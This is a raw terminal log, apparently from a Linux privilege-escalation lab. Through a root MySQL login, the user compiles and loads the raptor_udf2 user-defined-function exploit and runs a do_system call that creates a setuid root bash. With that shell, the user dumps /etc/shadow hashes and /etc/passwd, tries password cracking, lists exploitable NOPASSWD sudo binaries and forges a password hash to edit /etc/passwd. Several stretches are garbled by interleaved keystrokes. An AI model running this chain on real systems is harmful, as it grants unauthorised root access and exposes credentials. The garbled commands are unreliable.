177 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7866 (incorrect -> 0x7032), seq 26694964:26747530, ack 11070, win 482, options [nop,nop,TS val 997087991 ecr 3431984530], length 52566: HTTP
17800:43:01.808500 IP (tos 0x0, ttl 64, id 24675, offset 0, flags [DF], proto TCP (6), length 52)
179 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe4 (correct), seq 11070, ack 26747530, win 6091, options [nop,nop,TS val 3431984532 ecr 997087990], length 0
18000:43:01.838902 IP (tos 0x0, ttl 64, id 24676, offset 0, flags [DF], proto TCP (6), length 68)
181 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xecc5 (correct), seq 11070:11086, ack 26747530, win 6347, options [nop,nop,TS val 3431984562 ecr 997087990], length 16: HTTP
18200:43:01.854816 IP (tos 0x0, ttl 64, id 24677, offset 0, flags [DF], proto TCP (6), length 70)
183 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xf14c (correct), seq 11086:11104, ack 26747530, win 6347, options [nop,nop,TS val 3431984578 ecr 997087990], length 18: HTTP
18400:43:01.854940 IP (tos 0x0, ttl 64, id 24559, offset 0, flags [DF], proto TCP (6), length 52)
185 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x855d), seq 26747530, ack 11104, win 482, options [nop,nop,TS val 997088038 ecr 3431984562], length 0
18600:43:01.860901 IP (tos 0x0, ttl 64, id 24560, offset 0, flags [DF], proto TCP (6), length 62695)
187 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xfdf1), seq 26747530:26810173, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 62643: HTTP
18800:43:01.861149 IP (tos 0x0, ttl 64, id 24567, offset 0, flags [DF], proto TCP (6), length 2896)
189 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe4c3), seq 26810173:26813017, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 2844: HTTP
19000:43:01.861301 IP (tos 0x0, ttl 64, id 24678, offset 0, flags [DF], proto TCP (6), length 52)
191 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x9dad (correct), seq 11104, ack 26801224, win 6071, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
19200:43:01.861365 IP (tos 0x0, ttl 64, id 24679, offset 0, flags [DF], proto TCP (6), length 52)
193 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe0 (correct), seq 11104, ack 26813017, win 6003, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
19400:43:01.862496 IP (tos 0x0, ttl 64, id 24568, offset 0, flags [DF], proto TCP (6), length 57210)
195 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8a56 (incorrect -> 0x8614), seq 26813017:26870175, ack 11104, win 482, options [nop,nop,TS val 997088046 ecr 3431984584], length 57158: HTTP
196^Cssh user@10.10.170.166
202Owner@DESKTOP-8DUSIOO ~
203$ ssh user@10.10.170.166
204ssh: connect to host 10.10.170.166 port 22: Connection timed out
205
206Owner@DESKTOP-8DUSIOO ~
207$ ssh 10.10.170.166
208The authenticity of host '10.10.170.166 (10.10.170.166)' can't be esta
209blished.
210RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjkt
211Ank.
212Are you sure you want to continue connecting (yes/no)? yes
213Warning: Permanently added '10.10.170.166' (RSA) to the list of known
214Owner@DESKTOP-8DUSIOO ~
215$ ssh 10.10.170.166
216The authenticity of host '10.10.170.166 (10.10.170.166)' can't be established.
217RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjktAnk.
218Are you sure you want to continue connecting (yes/no)? yes
219Warning: Permanently added '10.10.170.166' (RSA) to the list of known hosts.
220owner@10.10.170.166's password:
221Permission denied, please try again.
222owner@10.10.170.166's password:
223Permission denied, please try again.
224owner@10.10.170.166's password:
225$ ssh 10.10.170.1666K0s
226Owner@DESKTOP-8DUSIOO ~ostname 10.10.170.166:22: No such host is known
227$ ssh 10.10.170.1666K0ssh: Could not resolve hostn
228ame 10.10.170.166:22: No such host is known.
229Owner@DESKTOP-8DUSIOO ~
230Owner@DESKTOP-8DUSIOO ~6 22
231$ 6 22
232ser@10user@10.10.170.166's passwor
233d:
234bash: 22: command not found
235Owner@DESKTOP-8DUSIOO ~
236Owner@DESKTOP-8DUSIOO ~6 22
237$ 6 220.10.170.1
23866's puser@10.10.170.166's password:
239owner@10.10.170.166's password:
240user@10.10.170.166's password:
241Owner@DESKTOP-8DUSIOO ~ound
242$ ssh 10.10.Ku
243Owner@DESKTOP- ~
244Owner@DESKTOP-8DUSIOO ~
245$ ssh user@10.10.170.166 22
246user@10.10.170.166's password:
247bash: 22: command not found
248bash: 22: command not found
249Owner@DESKTOP-8DUSIOO ~
250$ ssh user@10.10.170.166
251$ 6 22 [-E log_file] user@10.10.170.166's configfile] [-I pkcs11]
252password:
253Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
254
255The programs included with the Debian GNU/Linux system are free software;
256the exact distribution terms for each program are described in the
257individual files in /usr/share/doc/*/copyright.
258
259Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
260permitted by applicable law.
261Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
262user@debian:~$ id
263uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
265user@debian:~$ ls
266myvpn.ovpn tools
267user@debian:~$ cd tools/
268user@debian:~/tools$ ls
269kernel-exploits mysql-udf nginx privesc-scripts sudo suid
270user@debian:~/tools$ cd mysql-udf/
271user@debian:~/tools/mysql-udf$ ls
272raptor_udf2.c
273user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
274user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o raptor_udf2.so raptor_udf2
275.o -lc
276top - 20:04:48 up 11 min, 1 user, load average: 0.00, 0.07, 0.08
277Tasks: 83 total, 1 running, 82 sleeping, 0 stopped, 0 zombie
278Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
279Mem: 507168k total, 498240k used, 8928k free, 382220k buffers
280Swap: 901112k total, 0k used, 901112k free, 54236k cached
281
282 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
283 1 root 20 0 8396 812 680 S 0.0 0.2 0:01.06 init
284 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
285 3 root RT 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
286 4 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
287 5 root RT 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
288 6 root 20 0 0 0 0 S 0.0 0.0 0:00.01 events/0
289 7 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuset
290 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khelper
291 9 root 20 0 0 0 0 S 0.0 0.0 0:00.00 netns
292 10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 async/mgr
293 11 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pm
294 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
295 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenbus
296 14 root 20 0 0 0 0 S 0.0 0.0 0:00.00 sync_supers
297 15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
298 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kintegrityd/0
299 17 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kblockd/0
300 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpid
301 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_notify
302 20 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_hotplug
303 21 root 20 0 0 0 0 S 0.0 0.0 0:00.06 kseriod
304 23 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kondemand/0
305 24 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd
306 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kswapd0
307 26 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd
308 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 aio/0
309 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 crypto/0
310 165 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata/0
311 166 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata_aux
312 167 root 20 0 0 0 0 S 0.0 0.0 0:00.00 scsi_eh_0
313 168 root 20 0 0 0 0 S 0.0 0.0 0:00.01 scsi_eh_1
314 198 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kjournald
315 240 root 20 0 0 0 0 S 0.0 0.0 0:00.00 flush-202:0
316 275 root 16 -4 16784 796 380 S 0.0 0.2 0:00.34 udevd
317 425 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kpsmoused
318 932 root 18 -2 16780 720 308 S 0.0 0.1 0:00.00 udevd
319 933 root 18 -2 16780 648 236 S 0.0 0.1 0:00.00 udevd
320 1249 root 20 0 6796 756 284 S 0.0 0.1 0:00.03 dhclient
321 1279 daemon 20 0 8136 532 408 S 0.0 0.1 0:00.00 portmap
322 1311 statd 20 0 14424 896 732 S 0.0 0.2 0:00.00 rpc.statd
323 1314 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rpciod/0
324 1316 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd000
325 1317 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd001
326 1318 root 20 0 0 0 0 S 0.0 0.0 0:00.00 nfsiod
327 1325 root 20 0 27064 588 372 S 0.0 0.1 0:00.00 rpc.idmapd
328 1562 root 20 0 54336 1656 1084 S 0.0 0.3 0:00.08 rsyslogd
329 1638 root 20 0 3960 644 504 S 0.0 0.1 0:00.00 acpid
330 1672 root 20 0 71424 2896 1476 S 0.0 0.6 0:00.01 apache2
331 1675 www-data 20 0 71156 1992 596 S 0.0 0.4 0:00.00 apache2
332 1676 www-data 20 0 287m 2628 984 S 0.0 0.5 0:00.00 apache2
333 1677 www-data 20 0 287m 2644 996 S 0.0 0.5 0:00.00 apache2
334 1818 root 20 0 22468 1068 824 S 0.0 0.2 0:00.00 cron
335user@debian:~/tools/mysql-udf$ use mysql;
336-bash: use: command not found
337user@debian:~/tools/mysql-udf$ mysql -u root
338Welcome to the MySQL monitor. Commands end with ; or \g.
339Your MySQL connection id is 36
340Server version: 5.1.73-1+deb6u1 (Debian)
341
342Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
343
344Oracle is a registered trademark of Oracle Corporation and/or its
345affiliates. Other names may be trademarks of their respective
346owners.
347
348Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
349
350mysql> use mysql;
351Reading table information for completion of table and column names
352You can turn off this feature to get a quicker startup with -A
353
354Database changed
355mysql> create table foo(line blob);
356Query OK, 0 rows affected (0.00 sec)
357
358mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
359Query OK, 1 row affected (0.00 sec)
360
361mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
362Query OK, 1 row affected (0.00 sec)
363
364mysql> create function do_system returns integer soname 'raptor_udf2.so';
365Query OK, 0 rows affected (0.00 sec)
366
367mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
368+------------------------------------------------------------------+
369| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
370+------------------------------------------------------------------+
371| 0 |
372+------------------------------------------------------------------+
3731 row in set (0.00 sec)
374
375mysql> /q
376 -> exit
377 -> /quit
378 -> ^CCtrl-C -- exit!
379Aborted
380user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
381rootbash-4.1# id
382uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
384rootbash-4.1# cat /etc/shadow
385root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
38617298:0:99999:7:::
387daemon:*:17298:0:99999:7:::
388bin:*:17298:0:99999:7:::
389sys:*:17298:0:99999:7:::
390sync:*:17298:0:99999:7:::
391games:*:17298:0:99999:7:::
392man:*:17298:0:99999:7:::
393lp:*:17298:0:99999:7:::
394mail:*:17298:0:99999:7:::
395news:*:17298:0:99999:7:::
396uucp:*:17298:0:99999:7:::
397proxy:*:17298:0:99999:7:::
398www-data:*:17298:0:99999:7:::
399backup:*:17298:0:99999:7:::
400list:*:17298:0:99999:7:::
401irc:*:17298:0:99999:7:::
402gnats:*:17298:0:99999:7:::
403nobody:*:17298:0:99999:7:::
404libuuid:!:17298:0:99999:7:::
405Debian-exim:!:17298:0:99999:7:::
406sshd:*:17298:0:99999:7:::
407user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
40817298:0:99999:7:::
409statd:*:17299:0:99999:7:::
410mysql:!:18133:0:99999:7:::
411rootbash-4.1# cat /etc/passwd
412root:x:0:0:root:/root:/bin/bash
413daemon:x:1:1:daemon:/usr/sbin:/bin/sh
414bin:x:2:2:bin:/bin:/bin/sh
415sys:x:3:3:sys:/dev:/bin/sh
416sync:x:4:65534:sync:/bin:/bin/sync
417games:x:5:60:games:/usr/games:/bin/sh
418man:x:6:12:man:/var/cache/man:/bin/sh
419lp:x:7:7:lp:/var/spool/lpd:/bin/sh
420mail:x:8:8:mail:/var/mail:/bin/sh
421news:x:9:9:news:/var/spool/news:/bin/sh
422uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
423proxy:x:13:13:proxy:/bin:/bin/sh
424www-data:x:33:33:www-data:/var/www:/bin/sh
425backup:x:34:34:backup:/var/backups:/bin/sh
426list:x:38:38:Mailing List Manager:/var/list:/bin/sh
427irc:x:39:39:ircd:/var/run/ircd:/bin/sh
428gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
429nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
430libuuid:x:100:101::/var/lib/libuuid:/bin/sh
431Debian-exim:x:101:103::/var/spool/exim4:/bin/false
432sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
433user:x:1000:1000:user,,,:/home/user:/bin/bash
434statd:x:103:65534::/var/lib/nfs:/bin/false
435mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
436rootbash-4.1# cat /etc/hosts
437127.0.0.1 localhost
438127.0.1.1 debian.localdomain debian
439
440# The following lines are desirable for IPv6 capable hosts
441::1 ip6-localhost ip6-loopback
442fe00::0 ip6-localnet
443ff00::0 ip6-mcastprefix
444ff02::1 ip6-allnodes
445ff02::2 ip6-allrouters
446rootbash-4.1# ls -l /etc/shadow
447-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
448rootbash-4.1# cat /etc/shadow
449root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
45017298:0:99999:7:::
451daemon:*:17298:0:99999:7:::
452bin:*:17298:0:99999:7:::
453sys:*:17298:0:99999:7:::
454sync:*:17298:0:99999:7:::
455games:*:17298:0:99999:7:::
456man:*:17298:0:99999:7:::
457lp:*:17298:0:99999:7:::
458mail:*:17298:0:99999:7:::
459news:*:17298:0:99999:7:::
460uucp:*:17298:0:99999:7:::
461proxy:*:17298:0:99999:7:::
462www-data:*:17298:0:99999:7:::
463backup:*:17298:0:99999:7:::
464list:*:17298:0:99999:7:::
465irc:*:17298:0:99999:7:::
466gnats:*:17298:0:99999:7:::
467nobody:*:17298:0:99999:7:::
468libuuid:!:17298:0:99999:7:::
469Debian-exim:!:17298:0:99999:7:::
470sshd:*:17298:0:99999:7:::
471user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
47217298:0:99999:7:::
473statd:*:17299:0:99999:7:::
474mysql:!:18133:0:99999:7:::
475rootbash-4.1# wget
476wget: missing URL
477Usage: wget [OPTION]... [URL]...
478
479Try ‘wget --help’ for more options.
480rootbash-4.1# pwd
481/home/user/tools/mysql-udf
482rootbash-4.1# ls
483raptor_udf2.c raptor_udf2.o raptor_udf2.so
484rootbash-4.1# cd ..
485rootbash-4.1# ls
486kernel-exploits mysql-udf nginx privesc-scripts sudo suid
487rootbash-4.1# cd ..
488rootbash-4.1# ls
489myvpn.ovpn tools
490rootbash-4.1# cd tools/
491rootbash-4.1# ls
492kernel-exploits mysql-udf nginx privesc-scripts sudo suid
493rootbash-4.1# cd privesc-scripts/
494rootbash-4.1# ls
495LinEnum.sh linpeas.sh lse.sh
496rootbash-4.1# john --wordlist =/usr/share/wordlists/rockyou.txt hash.txt
497login as: user
498user@10.10.170.166's password:
499Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
500
501The programs included with the Debian GNU/Linux system are free software;
502the exact distribution terms for each program are described in the
503individual files in /usr/share/doc/*/copyright.
504
505Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
506permitted by applicable law.
507Last login: Sun Jan 17 21:12:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
508user@debian:~$ cd /home/user/tools/mysql.udf
509-bash: cd: /home/user/tools/mysql.udf: No such file or directory
510user@debian:~$ ls
511myvpn.ovpn tools
512user@debian:~$ cd tools/
513user@debian:~/tools$ ls
514kernel-exploits mysql-udf nginx privesc-scripts sudo suid
515user@debian:~/tools$ gcc -g -c raptor_udf2.c -fPIC
516gcc: raptor_udf2.c: No such file or directory
517gcc: no input files
518user@debian:~/tools$ cd mysql-udf/
519user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
520user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -1c
521gcc: unrecognized option '-soname,'
522gcc: unrecognized option '-1c'
523user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -lc
524gcc: unrecognized option '-soname,'
525user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o rapt or_udf2.so raptor_udf2.o -lc
526user@debian:~/tools/mysql-udf$ mysql -u root
527Welcome to the MySQL monitor. Commands end with ; or \g.
528Your MySQL connection id is 37
529Server version: 5.1.73-1+deb6u1 (Debian)
530
531Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
532
533Oracle is a registered trademark of Oracle Corporation and/or its
534affiliates. Other names may be trademarks of their respective
535owners.
536
537Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
538
539mysql> use mysql;
540Reading table information for completion of table and column names
541You can turn off this feature to get a quicker startup with -A
542
543Database changed
544mysql> create table bmillakid(line blob);
545Query OK, 0 rows affected (0.00 sec)
546
547mysql> insert into bmillakid values(load_file('home/usr/tools/mysql-udf/raptor_u df2.so' ));
548Query OK, 1 row affected (0.00 sec)
549
550mysql> select * from bmillakid into dumpfile '/usr/lib/mysql/plugin/raptor_udf2. so';
551ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
552mysql> exit
553Bye
554user@debian:~/tools/mysql-udf$ who am i
555user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.internal)
556user@debian:~/tools/mysql-udf$ links
557-bash: links: command not found
558user@debian:~/tools/mysql-udf$ lynx
559-bash: lynx: command not found
560user@debian:~/tools/mysql-udf$ wget
561wget: missing URL
562Usage: wget [OPTION]... [URL]...
563
564Try ‘wget --help’ for more options.
565user@debian:~/tools/mysql-udf$ cat /etc/shadow
566root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
567daemon:*:17298:0:99999:7:::
568bin:*:17298:0:99999:7:::
569sys:*:17298:0:99999:7:::
570sync:*:17298:0:99999:7:::
571games:*:17298:0:99999:7:::
572man:*:17298:0:99999:7:::
573lp:*:17298:0:99999:7:::
574mail:*:17298:0:99999:7:::
575news:*:17298:0:99999:7:::
576uucp:*:17298:0:99999:7:::
577proxy:*:17298:0:99999:7:::
578www-data:*:17298:0:99999:7:::
579backup:*:17298:0:99999:7:::
580list:*:17298:0:99999:7:::
581irc:*:17298:0:99999:7:::
582gnats:*:17298:0:99999:7:::
583nobody:*:17298:0:99999:7:::
584libuuid:!:17298:0:99999:7:::
585Debian-exim:!:17298:0:99999:7:::
586sshd:*:17298:0:99999:7:::
587user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjw YpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
588statd:*:17299:0:99999:7:::
589mysql:!:18133:0:99999:7:::
590bmillakid:!:18645:0:99999:7:::
591user@debian:~/tools/mysql-udf$ cat /etc/passwd
592root:x:0:0:root:/root:/bin/bash
593daemon:x:1:1:daemon:/usr/sbin:/bin/sh
594bin:x:2:2:bin:/bin:/bin/sh
595sys:x:3:3:sys:/dev:/bin/sh
596sync:x:4:65534:sync:/bin:/bin/sync
597games:x:5:60:games:/usr/games:/bin/sh
598man:x:6:12:man:/var/cache/man:/bin/sh
599lp:x:7:7:lp:/var/spool/lpd:/bin/sh
600mail:x:8:8:mail:/var/mail:/bin/sh
601news:x:9:9:news:/var/spool/news:/bin/sh
602uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
603proxy:x:13:13:proxy:/bin:/bin/sh
604www-data:x:33:33:www-data:/var/www:/bin/sh
605backup:x:34:34:backup:/var/backups:/bin/sh
606list:x:38:38:Mailing List Manager:/var/list:/bin/sh
607irc:x:39:39:ircd:/var/run/ircd:/bin/sh
608gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
609nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
610libuuid:x:100:101::/var/lib/libuuid:/bin/sh
611Debian-exim:x:101:103::/var/spool/exim4:/bin/false
612sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
613user:x:1000:1000:user,,,:/home/user:/bin/bash
614statd:x:103:65534::/var/lib/nfs:/bin/false
615mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
616bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
617user@debian:~/tools/mysql-udf$ ls -la user
618ls: cannot access user: No such file or directory
619user@debian:~/tools/mysql-udf$ pwd
620/home/user/tools/mysql-udf
621user@debian:~/tools/mysql-udf$ who am i
622user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.internal)
623user@debian:~/tools/mysql-udf$ whoami
624user
625user@debian:~/tools/mysql-udf$ ls -la /
626total 96
627drwxr-xr-x 22 root root 4096 Aug 25 2019 .
628drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
629drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
630drwxr-xr-x 3 root root 4096 May 12 2017 boot
631drwxr-xr-x 12 root root 2820 Jan 17 19:55 dev
632drwxr-xr-x 67 root root 4096 Jan 17 21:16 etc
633drwxr-xr-x 3 root root 4096 May 15 2017 home
634lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32-5-amd64
635drwxr-xr-x 12 root root 12288 May 14 2017 lib
636lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
637drwx------ 2 root root 16384 May 12 2017 lost+found
638drwxr-xr-x 3 root root 4096 May 12 2017 media
639drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
640drwxr-xr-x 2 root root 4096 May 12 2017 opt
641dr-xr-xr-x 96 root root 0 Jan 17 19:53 proc
642drwx------ 5 root root 4096 May 15 2020 root
643drwxr-xr-x 2 root root 4096 May 13 2017 sbin
644drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
645drwxr-xr-x 2 root root 4096 May 12 2017 srv
646drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
647drwxr-xr-x 13 root root 0 Jan 17 19:53 sys
648drwxrwxrwt 2 root root 4096 Jan 17 21:19 tmp
649drwxr-xr-x 11 root root 4096 May 13 2017 usr
650drwxr-xr-x 14 root root 4096 May 13 2017 var
651lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64
652user@debian:~/tools/mysql-udf$ whoami
653user
654user@debian:~/tools/mysql-udf$ sudo -l
655Matching Defaults entries for user on this host:
656 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
657
658User user may run the following commands on this host:
659 (root) NOPASSWD: /usr/sbin/iftop
660 (root) NOPASSWD: /usr/bin/find
661 (root) NOPASSWD: /usr/bin/nano
662 (root) NOPASSWD: /usr/bin/vim
663 (root) NOPASSWD: /usr/bin/man
664 (root) NOPASSWD: /usr/bin/awk
665 (root) NOPASSWD: /usr/bin/less
666 (root) NOPASSWD: /usr/bin/ftp
667 (root) NOPASSWD: /usr/bin/nmap
668 (root) NOPASSWD: /usr/sbin/apache2
669 (root) NOPASSWD: /bin/more
670user@debian:~/tools/mysql-udf$ cat /etc/shadow | grep root
671root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
672user@debian:~/tools/mysql-udf$ ls -l /etc/passwd
673-rw-r--r-- 1 root root 1056 Jan 17 20:33 /etc/passwd
674user@debian:~/tools/mysql-udf$ openssl passwd l33th4x0rbr0!
675Warning: truncating password to 8 characters
6765v3Bvw7Nf6Zbs
677user@debian:~/tools/mysql-udf$
678user@debian:~/tools/mysql-udf$ 5v3Bvw7Nf6Zbs
679-bash: 5v3Bvw7Nf6Zbs: command not found
680user@debian:~/tools/mysql-udf$ nano /etc/passwd
681user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
682rootbash-4.1# su newroot
683Unknown id: newroot
684rootbash-4.1# whoami
685root
686rootbash-4.1# cat /etc/passwd
687root:x:0:0:root:/root:/bin/bash
688daemon:x:1:1:daemon:/usr/sbin:/bin/sh
689bin:x:2:2:bin:/bin:/bin/sh
690sys:x:3:3:sys:/dev:/bin/sh
691sync:x:4:65534:sync:/bin:/bin/sync
692games:x:5:60:games:/usr/games:/bin/sh
693man:x:6:12:man:/var/cache/man:/bin/sh
694lp:x:7:7:lp:/var/spool/lpd:/bin/sh
695mail:x:8:8:mail:/var/mail:/bin/sh
696news:x:9:9:news:/var/spool/news:/bin/sh
697uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
698proxy:x:13:13:proxy:/bin:/bin/sh
699www-data:x:33:33:www-data:/var/www:/bin/sh
700backup:x:34:34:backup:/var/backups:/bin/sh
701list:x:38:38:Mailing List Manager:/var/list:/bin/sh
702irc:x:39:39:ircd:/var/run/ircd:/bin/sh
703gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
704nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
705libuuid:x:100:101::/var/lib/libuuid:/bin/sh
706Debian-exim:x:101:103::/var/spool/exim4:/bin/false
707sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
708user:x:1000:1000:user,,,:/home/user:/bin/bash
709statd:x:103:65534::/var/lib/nfs:/bin/false
710mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
711bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
712rootbash-4.1# su root
713Password:
714su: Authentication failure
715rootbash-4.1# exit
716exit
717user@debian:~/tools/mysql-udf$ sudo -l
718Matching Defaults entries for user on this host:
719 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
720
721User user may run the following commands on this host:
722 (root) NOPASSWD: /usr/sbin/iftop
723 (root) NOPASSWD: /usr/bin/find
724 (root) NOPASSWD: /usr/bin/nano
725 (root) NOPASSWD: /usr/bin/vim
726 (root) NOPASSWD: /usr/bin/man
727 (root) NOPASSWD: /usr/bin/awk
728 (root) NOPASSWD: /usr/bin/less
729 (root) NOPASSWD: /usr/bin/ftp
730 (root) NOPASSWD: /usr/bin/nmap
731 (root) NOPASSWD: /usr/sbin/apache2
732 (root) NOPASSWD: /bin/more
